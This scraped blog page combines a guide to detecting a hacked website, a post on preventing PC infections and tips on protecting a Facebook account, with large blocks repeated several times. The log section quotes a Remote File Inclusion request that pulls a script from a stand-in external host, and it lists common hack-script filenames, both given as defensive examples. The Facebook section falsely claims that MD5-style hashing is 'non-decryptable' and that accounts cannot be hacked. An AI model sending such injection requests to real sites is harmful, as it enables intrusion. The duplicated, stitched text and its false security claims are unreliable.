1) Google says "This site may harm your computer"
If Google or Yahoo search engine result pages (SERPs) display a warning about your site, the most common cause is that your site was hacked. Please see the separate article about how to investigate and remove the Google / StopBadware warning message.
2) Visitors report getting viruses from your web pages
If visitors report to you that they get viruses or antivirus alerts from browsing your pages, it usually means your site has been hacked. Google and Yahoo will soon start displaying malware warnings about your site, so see the article about it, above.
It is, however, possible for your pages to deliver viruses even if your site hasn't been hacked. This can occur when your pages pull some of their content from third parties such as advertisers, and they got hacked or someone slipped a malicious advertisement into their lineup. That scenario is also discussed in the article above.
3) Visitors report being redirected to other websites
If you or other people try to visit your website but get automatically taken to some other website instead, it's another symptom of being hacked. It's a similar situation to the two described above and will eventually earn a Google or Yahoo! "badware flag". See the article referenced above.
4) Your traffic decreases dramatically and suddenly
Most web surfers stay away from sites that have the warning "This site may harm your computer". Those who continue to the site and get a virus or antivirus alert will leave immediately and not browse around. Either way, you'll see a drop in traffic. Anytime your traffic drops suddenly, investigate.
5) Your files contain code you didn't put there
If your pages suddenly contain links, text, or other objects you didn't put there, it's an indication you've been hacked. The source code of your pages (the text in your .htm, .html, or .php files, for example) should always stay the same as it was when you created it. If it changes, it's an indication someone figured out how to break into your site and change it. That should never happen.
One exception is that free webhosts sometimes require that you allow them to put ads into your pages. Occasionally someone thinks they've been hacked when it's really just the webhost's advertising code. If in doubt and you use free hosting, read the Terms of Service of your hosting plan.
6) Your site contains files you didn't put there
This is just like #5 above, except there are entire new files. It can be harder to make a judgment about new files because a site usually does contain files you didn't put there, many of them necessary for proper functioning (although most are in folders whose names are an indication of what they're for). You can examine text files to see if their contents look suspicious. Don't delete files just because you don't recognize them. Once you're afraid you might have been hacked, everything can look suspicious, even things that were always there that you just never noticed before.
7) Your search engine result page (SERP) listings suddenly change
When your site appears in search result listings, the pages listed should be pages that you know really exist, and the text shown should be related to what your site is about. If the listings suddenly show weird-named pages or text about topics unrelated to your site's content, it's another symptom of being hacked.
Places where you can monitor your site status
An important aspect of monitoring your site is to notice unusual changes, things that are different from normal, so make a habit of paying attention now to what is normal and usual, while your site is not hacked.
1) Each time you log into cPanel
Make a habit of checking the "Last login from:" box to make sure it shows your IP address from the last time you logged in.
2) Google Webmaster Central > Webmaster Tools
Google account (free) and login required. Google notifies you in Webmaster Tools if your site gets flagged as harmful. They often notify you by email, too, if they have your email address. You can also check your Google status anytime by typing this in a Google search box and viewing the results: site:yourdomain.com.
Google Webmaster Tools has other useful features. You can review the words and phrases of web searches for which your pages are being listed (make sure the phrases are relevant to your site's content), review errors that Googlebot has encountered on your site, and more.
3) Google Safe Browsing Diagnostic database
Warning messages in Google search results are based on a Google database. You can view an up-to-date report from the database for any website by entering this URL in your browser address bar. Replace EXAMPLE.COM with the address of the website you want to check:
http://www.google.com/safebrowsing/diagnostic?site=EXAMPLE.COM
I wrote a few paragraphs about how to interpret the diagnostic report here.
4) StopBadware.org Clearinghouse database
If your site is flagged, you'll find a short summary of badware behavior found.
5) Norton Safe Web, from Symantec
Reports the threats, categorized by type, that have been found on websites. You can go directly to the report for any site with this address (replace EXAMPLE.COM):
http://safeweb.norton.com/report/show?url=EXAMPLE.COM
6) McAfee SiteAdvisor safety and outlink reports
The report describes how many emails they received after registering at a site, how spammy the emails were, whether the site has outlinks to bad websites, and whether they found viruses or spyware on pages or in downloads. Users sometimes post public comments with complaints or praise. SiteAdvisor is a way to learn what others think of your site. It doesn't seem to be updated very often, however, so it's not an early warning system.
7) W3C HTML Validator
If your pages usually validate ok, but suddenly stop validating, it can be a sign that new code was inserted at invalid locations in your files. The reported validation errors might be at exactly the locations where the injected code is.
8) Search engine result pages (SERPs)
At each of the popular search engines, watch for:
• Pages that the search engine says are on your site, but that you didn't put there.
• Text snippets that are wrong, containing text not related to your site's subject.
9) When you browse your own site
Always use an up-to-date antivirus and antispyware program on your own PC so you'll be alerted if your website starts delivering malware. Use "real-time" (also known as "on access") protection that catches malicious files as soon they are received. An on-demand scanner (such as a free online scanner, or a once-a-day manual scan) isn't enough. By the time you identify and quarantine the virus, the damage it was intended to cause might already be done.
Use your browser's View Source feature occasionally to inspect your page's HTML code for text injections of invisible iframes, JavaScript, and links to malicious websites. These are often the definitive indicators that the pages have been tampered with. The "badware investigation" article referenced above shows examples of what these things look like. They're just text. Once you know what to look for, they're easy to recognize.
It's a good idea also to check a few files on your server from time to time. Open your home page in your control panel's File Manager and inspect the HTML for the signs of tampering described above.
Whenever you are viewing a list of the files on your server (such as in cPanel > File Manager or by FTP), be alert for file names you don't recognize or sizes that are obviously wrong (such as a size of 0 for a file you know should be bigger).
The files on your server should never be different from what they were when you originally uploaded them. A file getting modified on your server without your permission is not normal. If it happens at all, it is an indication that something is wrong.
10) You can search your site files for suspicious code
This customizable PHP script can help search your website files for suspicious code or other suspicious text.
11) HTTP access log
This log records the requests for pages and other files from your site. When someone attacks your site (whether successfully or not), the attack is often recorded in your website access logs.
If you want to discover whether your site is being attacked, my hack attempt identifier online calculator can help with that. You paste lines from your HTTP log to find out which ones are hack attempts. Remember that just because an attack occurred doesn't mean it was successful, but it's still useful to know what you're up against.
Besides the information provided by the calculator, there are other indicators of a site compromise. If there are successful requests (HTTP result code 200) in your log for files you didn't put on the site, it's suspicious. It's even more suspicious if the filenames are variations of these often-used names for hack scripts: id.txt, cmd.txt, safe.txt, r57.txt, test.txt, echo.txt, php.txt, load.txt, or mic.txt.
Don't panic just because you find mentions of those filenames. You probably will find them. It matters where the names appear. Here are two different types of requests:
1. This one is a "Remote File Inclusion" (RFI) attack on your site. The GET command is requesting your index.php. It is trying to use the "query string" (the part after the first question mark) to inject safe.txt from the other site into your site. This is cause for concern because if it succeeds, your site will be hacked. However, this log line does not mean it has succeeded. It is just an attempt, and it is normal to find many of these attempts in your logs:
GET /blog/index.php?article=http://famousuniversity.com/user/safe.txt?
2. If the attack on your site does succeed (which you cannot determine from your log data alone), here is what famousuniversity will see in their log. This is a sign, to them, that they have been hacked. This GET is requesting safe.txt. If the result code is 200 (Success), it means the file was served, so it must be on the server. If they know that a file called safe.txt shouldn't be there, it means they were hacked and it was put there by somebody else, so they should find and examine the file. It is usually a PHP script intended to be used in attacks on other sites. I use famousuniversity as an example because my site actually has been attacked with scripts hosted at famous universities whose user accounts were compromised. It happens.
GET /user/safe.txt
As demonstrated in example 1, your access log is the place to learn how your site is being attacked, whether successfully or not, so you can learn what things you need to defend against.
Near-misses are good to learn from. If you find an attack that did not succeed in doing harm but did return a result code of 200 (meaning the server accepted the request and sent a file), it is a good idea to determine the malicious feature of the attack code and revise your .htaccess to block those types of requests. The goal should be for every known type of attack to get a 403 Forbidden result instead of 200. That will mean that your server rejected the request "at the front door", and the attack never had the opportunity to do harm. The Website Security article linked at the top of this page has some specific methods for this type of request blocking.
Your HTTP and FTP access logs (see the next section) are usually available for download at cPanel > Raw Log Manager. The log files are usually stored outside public_html, sometimes in a folder called /logs, which you can find with cPanel > File Manager or with FTP.
11) FTP access log
Unauthorized users, IP addresses, or file transfers in your FTP log are proof that your site is compromised.
Tuesday, March 15, 2011
How to Prevent Hacking of your PC?
There are many ways when a hacker would try to scam you into receiving a file etc, so that you will take the bait and help him with the trojan/virus installation on your hard disk drive. If you need just one way to stop being hacked, the best way is to install an all-in-one solution with anti-virus, firewall and anti-spyware solution.
We personally use Norton Internet Security and we update our subscription every year. Another similar product which you may consider is ZoneAlarm, but we recommend Norton for their years and track records in the anti-virus arena. btw, we don't get commission for recommending, so you can trust our advise. Not to forget that I am a trained hacker myself.
Nevertheless, you must know that whether or not your PC will be hacked will depend very much on your actions as well. For example, downloading files from warez sites and poor habits of opening up strange email attachments, is as good as inviting hackers to break your door. Some time ago, I have the opportunity to try removing a malignant spyware installed on a friend's machine. It took me 8 hours despite my experience, and eventually we had to reinstall the entire OS. Some of you might say that I should have reinstall it after a short tryout, however, I preferred to take the challenge but failed. :)
Prevention is always better than cure. If you would like to take the risk, a common practice (for some of us) is to use another PC when we need to do something risky. With constant PC upgrades, many of us could easily keep an older PC (at least one) just for this purpose. This reminds me of the hacking class that I attended a few years back - the instructor had to reinstall all the workstations almost every lesson to get rid of the remaining virus or trojans from the previous lessons.
Another way of getting into trouble is to visit cracks, warez, and keygen websites. There are several ways which your PC may be infected:
1) Clicking on buttons on the site which activates malicious scripts, including Scareware windows.
2) Trojans, virus or spyware hidden in the software cracks, or keygen.
3) Trojans, virus, or spyware hidden in attachments of emails, and this include pictures.
Althought we did mention earlier that you must have at least one security software installed on your PC, however, it is impossible to guarantee that the software will definitely protect you against Any or All the possible viruses, trojans and malicious programs.
If you find that your PC behaves abnormally, such as unexpected pop-up ads, shutting down of applications, poor internet connections (or busy connections), etc, there is a good chance that your PC is infected. You will need to waste quite a bit of time to perform a complete PC scan, try to locate and remove the infected file, or to reformat and reinstall the entire harddisk again. Again, prevention is always better than cure, so backup your data at all times. Some virus does more than simply shutting down your PC, they can damage your hard disk physically by force writing over a specific sector repeatedly within a very short time. We will not go into that.
We will summarize the 3 generic recommendations below.
* Install a good internet security software (currently Norton 360 is recommended) and pay for the auto-update. This is important.
* Do not visit high-risk websites or click on any of the links there.
We personally use Norton Internet Security and we update our subscription every year. Another similar product which you may consider is ZoneAlarm, but we recommend Norton for their years and track records in the anti-virus arena. btw, we don't get commission for recommending, so you can trust our advise. Not to forget that I am a trained hacker myself.
Nevertheless, you must know that whether or not your PC will be hacked will depend very much on your actions as well. For example, downloading files from warez sites and poor habits of opening up strange email attachments, is as good as inviting hackers to break your door. Some time ago, I have the opportunity to try removing a malignant spyware installed on a friend's machine. It took me 8 hours despite my experience, and eventually we had to reinstall the entire OS. Some of you might say that I should have reinstall it after a short tryout, however, I preferred to take the challenge but failed. :)
Prevention is always better than cure. If you would like to take the risk, a common practice (for some of us) is to use another PC when we need to do something risky. With constant PC upgrades, many of us could easily keep an older PC (at least one) just for this purpose. This reminds me of the hacking class that I attended a few years back - the instructor had to reinstall all the workstations almost every lesson to get rid of the remaining virus or trojans from the previous lessons.
Another way of getting into trouble is to visit cracks, warez, and keygen websites. There are several ways which your PC may be infected:
1) Clicking on buttons on the site which activates malicious scripts, including Scareware windows.
2) Trojans, virus or spyware hidden in the software cracks, or keygen.
3) Trojans, virus, or spyware hidden in attachments of emails, and this include pictures.
Althought we did mention earlier that you must have at least one security software installed on your PC, however, it is impossible to guarantee that the software will definitely protect you against Any or All the possible viruses, trojans and malicious programs.
If you find that your PC behaves abnormally, such as unexpected pop-up ads, shutting down of applications, poor internet connections (or busy connections), etc, there is a good chance that your PC is infected. You will need to waste quite a bit of time to perform a complete PC scan, try to locate and remove the infected file, or to reformat and reinstall the entire harddisk again. Again, prevention is always better than cure, so backup your data at all times. Some virus does more than simply shutting down your PC, they can damage your hard disk physically by force writing over a specific sector repeatedly within a very short time. We will not go into that.
We will summarize the 3 generic recommendations below.
* Install a good internet security software (currently Norton 360 is recommended) and pay for the auto-update. This is important.
* Do not visit high-risk websites or click on any of the links there.
How to Prevent Hacking of your PC?
There are many ways when a hacker would try to scam you into receiving a file etc, so that you will take the bait and help him with the trojan/virus installation on your hard disk drive. If you need just one way to stop being hacked, the best way is to install an all-in-one solution with anti-virus, firewall and anti-spyware solution.
We personally use Norton Internet Security and we update our subscription every year. Another similar product which you may consider is ZoneAlarm, but we recommend Norton for their years and track records in the anti-virus arena. btw, we don't get commission for recommending, so you can trust our advise. Not to forget that I am a trained hacker myself.
Nevertheless, you must know that whether or not your PC will be hacked will depend very much on your actions as well. For example, downloading files from warez sites and poor habits of opening up strange email attachments, is as good as inviting hackers to break your door. Some time ago, I have the opportunity to try removing a malignant spyware installed on a friend's machine. It took me 8 hours despite my experience, and eventually we had to reinstall the entire OS. Some of you might say that I should have reinstall it after a short tryout, however, I preferred to take the challenge but failed. :)
Prevention is always better than cure. If you would like to take the risk, a common practice (for some of us) is to use another PC when we need to do something risky. With constant PC upgrades, many of us could easily keep an older PC (at least one) just for this purpose. This reminds me of the hacking class that I attended a few years back - the instructor had to reinstall all the workstations almost every lesson to get rid of the remaining virus or trojans from the previous lessons.
Another way of getting into trouble is to visit cracks, warez, and keygen websites. There are several ways which your PC may be infected:
1) Clicking on buttons on the site which activates malicious scripts, including Scareware windows.
2) Trojans, virus or spyware hidden in the software cracks, or keygen.
3) Trojans, virus, or spyware hidden in attachments of emails, and this include pictures.
Althought we did mention earlier that you must have at least one security software installed on your PC, however, it is impossible to guarantee that the software will definitely protect you against Any or All the possible viruses, trojans and malicious programs.
If you find that your PC behaves abnormally, such as unexpected pop-up ads, shutting down of applications, poor internet connections (or busy connections), etc, there is a good chance that your PC is infected. You will need to waste quite a bit of time to perform a complete PC scan, try to locate and remove the infected file, or to reformat and reinstall the entire harddisk again. Again, prevention is always better than cure, so backup your data at all times. Some virus does more than simply shutting down your PC, they can damage your hard disk physically by force writing over a specific sector repeatedly within a very short time. We will not go into that.
We will summarize the 3 generic recommendations below.
* Install a good internet security software (currently Norton 360 is recommended) and pay for the auto-update. This is important.
* Do not visit high-risk websites or click on any of the links there.
We personally use Norton Internet Security and we update our subscription every year. Another similar product which you may consider is ZoneAlarm, but we recommend Norton for their years and track records in the anti-virus arena. btw, we don't get commission for recommending, so you can trust our advise. Not to forget that I am a trained hacker myself.
Nevertheless, you must know that whether or not your PC will be hacked will depend very much on your actions as well. For example, downloading files from warez sites and poor habits of opening up strange email attachments, is as good as inviting hackers to break your door. Some time ago, I have the opportunity to try removing a malignant spyware installed on a friend's machine. It took me 8 hours despite my experience, and eventually we had to reinstall the entire OS. Some of you might say that I should have reinstall it after a short tryout, however, I preferred to take the challenge but failed. :)
Prevention is always better than cure. If you would like to take the risk, a common practice (for some of us) is to use another PC when we need to do something risky. With constant PC upgrades, many of us could easily keep an older PC (at least one) just for this purpose. This reminds me of the hacking class that I attended a few years back - the instructor had to reinstall all the workstations almost every lesson to get rid of the remaining virus or trojans from the previous lessons.
Another way of getting into trouble is to visit cracks, warez, and keygen websites. There are several ways which your PC may be infected:
1) Clicking on buttons on the site which activates malicious scripts, including Scareware windows.
2) Trojans, virus or spyware hidden in the software cracks, or keygen.
3) Trojans, virus, or spyware hidden in attachments of emails, and this include pictures.
Althought we did mention earlier that you must have at least one security software installed on your PC, however, it is impossible to guarantee that the software will definitely protect you against Any or All the possible viruses, trojans and malicious programs.
If you find that your PC behaves abnormally, such as unexpected pop-up ads, shutting down of applications, poor internet connections (or busy connections), etc, there is a good chance that your PC is infected. You will need to waste quite a bit of time to perform a complete PC scan, try to locate and remove the infected file, or to reformat and reinstall the entire harddisk again. Again, prevention is always better than cure, so backup your data at all times. Some virus does more than simply shutting down your PC, they can damage your hard disk physically by force writing over a specific sector repeatedly within a very short time. We will not go into that.
We will summarize the 3 generic recommendations below.
* Install a good internet security software (currently Norton 360 is recommended) and pay for the auto-update. This is important.
* Do not visit high-risk websites or click on any of the links there.
How to protect my facebook account from hacking?
This is exactly what you should do:
1. Install anti virus to prevent trojans stealing information.
2. Change your password regularly
3. Make sure your friend doesn't have access to your computer physically
4. Do not open or download any executable file unless you know what you are doing
5. Have a strong password consisting of alphanumeric and special charecters
6. Reconfirm your primary/secondary mail address
7. Do not give out your password to anybody at all
8. Keep a unique password to FB than your other online accounts
9. Relax
FB stores its passwords in a non-decryptable hashes(using hashing algorithms like md5) and cannot be hacked. Only way it can be hacked is by your actions.
You must be using some pretty easy passwords, or you are writing them down and he is finding them. Use a password generator (google it)to generate a password with cap and lower case letters, numbers, and symbols and see if that stops him.
1. Never click suspicious links: It is possible that your friends could unwillingly send spam, viruses, or malware through Facebook if their accounts are infected. Do not click this material and do not run any ".exe" files on your computer without knowing what they are. Also, be sure to use the most current version of your browser as they contain important security warnings and protection features. Current versions of Firefox and Internet Explorer warn you if you have navigated to a suspected phishing site, and we recommend that you upgrade your browser to the most current version. You can also find more information about phishing and how to avoid it at http://www.antiphishing.org/consumer_recs.html and http://onguardonline.gov/phishing.html.
Phishing is an online attempt to trick a user by pretending to be an official login page or an official email from an organization that you would have an account with, such as a bank or an email provider, in order to obtain a user’s login and account information. In the case of a phishing login page, the login page may look identical to the login page you would normally go to, but the website does not belong to the organization you have an account with (the URL web address of the website should reflect this). In the case of a phishing email, the email may look like an email you would get from the organization you have an account with and get emails from, but the link in the email that it directs you to takes you to the above phishing login page, rather than a legitimate login page for that organization.
To prevent your account information from being obtained in a phishing scheme, only log in to legitimate pages of the websites you have an account with. For example, "www.facebook.example.com" is not a legitimate Facebook page on the "www.facebook.com" domain, but "www.facebook.com/example" is a legitimate Facebook page because it has the "facebook.com" domain. When in doubt, you can always just type in "facebook.com" into your browser to return to the legitimate Facebook site.
2. Have a unique, strong password: From the Account Settings page, be sure to use a different password than you use for other sites or services, made up of a complex string of numbers, letters, and punctuation marks that is at least six characters in length. Do not use words found in the dictionary.
3. Run anti-virus software: If your computer has been infected with a virus or with malware, you will need to run anti-virus software to remove harmful programs and keep your information secure.
* For Windows:
http://www.microsoft.com/protect/viruses/xp/av.mspx http://www.microsoft.com/protect/computer/viruses/default.mspx
* For Apple/Mac OS:
http://support.apple.com/kb/HT1222
1. Install anti virus to prevent trojans stealing information.
2. Change your password regularly
3. Make sure your friend doesn't have access to your computer physically
4. Do not open or download any executable file unless you know what you are doing
5. Have a strong password consisting of alphanumeric and special charecters
6. Reconfirm your primary/secondary mail address
7. Do not give out your password to anybody at all
8. Keep a unique password to FB than your other online accounts
9. Relax
FB stores its passwords in a non-decryptable hashes(using hashing algorithms like md5) and cannot be hacked. Only way it can be hacked is by your actions.
You must be using some pretty easy passwords, or you are writing them down and he is finding them. Use a password generator (google it)to generate a password with cap and lower case letters, numbers, and symbols and see if that stops him.
1. Never click suspicious links: It is possible that your friends could unwillingly send spam, viruses, or malware through Facebook if their accounts are infected. Do not click this material and do not run any ".exe" files on your computer without knowing what they are. Also, be sure to use the most current version of your browser as they contain important security warnings and protection features. Current versions of Firefox and Internet Explorer warn you if you have navigated to a suspected phishing site, and we recommend that you upgrade your browser to the most current version. You can also find more information about phishing and how to avoid it at http://www.antiphishing.org/consumer_recs.html and http://onguardonline.gov/phishing.html.
Phishing is an online attempt to trick a user by pretending to be an official login page or an official email from an organization that you would have an account with, such as a bank or an email provider, in order to obtain a user’s login and account information. In the case of a phishing login page, the login page may look identical to the login page you would normally go to, but the website does not belong to the organization you have an account with (the URL web address of the website should reflect this). In the case of a phishing email, the email may look like an email you would get from the organization you have an account with and get emails from, but the link in the email that it directs you to takes you to the above phishing login page, rather than a legitimate login page for that organization.
To prevent your account information from being obtained in a phishing scheme, only log in to legitimate pages of the websites you have an account with. For example, "www.facebook.example.com" is not a legitimate Facebook page on the "www.facebook.com" domain, but "www.facebook.com/example" is a legitimate Facebook page because it has the "facebook.com" domain. When in doubt, you can always just type in "facebook.com" into your browser to return to the legitimate Facebook site.
2. Have a unique, strong password: From the Account Settings page, be sure to use a different password than you use for other sites or services, made up of a complex string of numbers, letters, and punctuation marks that is at least six characters in length. Do not use words found in the dictionary.
3. Run anti-virus software: If your computer has been infected with a virus or with malware, you will need to run anti-virus software to remove harmful programs and keep your information secure.
* For Windows:
http://www.microsoft.com/protect/viruses/xp/av.mspx http://www.microsoft.com/protect/computer/viruses/default.mspx
* For Apple/Mac OS:
http://support.apple.com/kb/HT1222
Subscribe to:
Posts (Atom)